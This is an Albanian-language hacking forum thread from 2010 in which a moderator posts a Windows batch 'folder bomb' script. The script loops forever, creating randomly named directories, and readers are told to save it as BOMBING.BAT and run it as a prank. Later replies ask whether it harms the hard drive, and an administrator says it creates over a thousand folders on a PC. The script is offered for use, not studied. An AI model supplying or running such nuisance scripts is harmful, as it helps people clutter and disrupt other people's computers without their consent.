Bani folder bomb

  Share
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Bani folder bomb

  Mesazh nga Zone-X prej Tue Jan 26, 2010 8:21 pm

  Beni FOLDER BOMB
  hapim notepad e fusim kete kodin

  @echo off
  color 0C
  :a
  md %random%
  goto :a
  dhe e ruajme BOMBING.BAT
  Edhe shikojeni...Shpresoj tju pelqeje [You must be registered and logged in to see this image.]
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Bani folder bomb

  Mesazh nga h0Ax b00ter prej Tue Jan 26, 2010 8:23 pm

  Post i jemi osht ky a [You must be registered and logged in to see this image.]
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Re: Bani folder bomb

  Mesazh nga Zone-X prej Fri Feb 12, 2010 11:48 pm

  po e di po deshka pak met ba shka ( hajgare )
  avatar
  Ultr!x-H4ck3r
  Member
  Member

  Poenat : 2
  Reputacioni : 0
  Vendndodhja : Kukes
  Numri i postimeve : 2

  Re: Bani folder bomb

  Mesazh nga Ultr!x-H4ck3r prej Sun Mar 07, 2010 5:56 am

  po si bomb bomb ta djeg HDD apo bomb figure shaka lol!
  avatar
  h0Ax b00ter
  Administrator
  Administrator

  Male Age : 22
  Poenat : 498
  Reputacioni : 0
  Vendndodhja : @ AHT
  Numri i postimeve : 249

  Re: Bani folder bomb

  Mesazh nga h0Ax b00ter prej Sun Mar 07, 2010 12:12 pm

  T'i Krijon mbi 1000 a me shum foldera ne PC

  Sponsored content

  Re: Bani folder bomb

  Mesazh nga Sponsored content


   Ora është Sun Dec 16, 2018 5:38 pm